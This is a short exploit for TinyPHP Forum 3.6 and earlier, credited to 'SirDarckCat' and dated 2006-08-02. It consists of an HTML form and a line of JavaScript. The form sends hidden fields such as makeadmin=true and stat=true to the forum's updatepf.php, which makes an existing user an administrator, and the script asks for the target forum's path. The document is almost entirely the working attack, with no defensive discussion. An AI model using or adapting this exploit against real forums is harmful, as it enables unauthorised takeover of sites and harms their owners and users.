# Title : TinyPHP Forum <= 3.6 (makeadmin) Remote Admin Maker Exploit
# Published : 2006-08-02
# Author : SirDarckCat
TinyPHPForum 3.6 Admin Maker<br>
By SirDarckCat from elhacker.net
<FORM method=post enctype="multipart/form-data">
Existing User:<INPUT name=uname><br>
<INPUT type=file name=userfile style="visibility:HIDDEN"><br>
<INPUT type=hidden name=email value="a@b.c">
<input type=hidden name=makeadmin value=true>
<input type=hidden name=stat value=true>
<input type=hidden name=ulang value=en>
<input type=hidden name=uskin value=default>
<INPUT type=submit>
</FORM>
<script language="JavaScript">
document.forms[0].action=prompt("Path to forum","http://www.server.com/tpf/")+"updatepf.php";
</script>
# www.Syue.com [2006-08-02]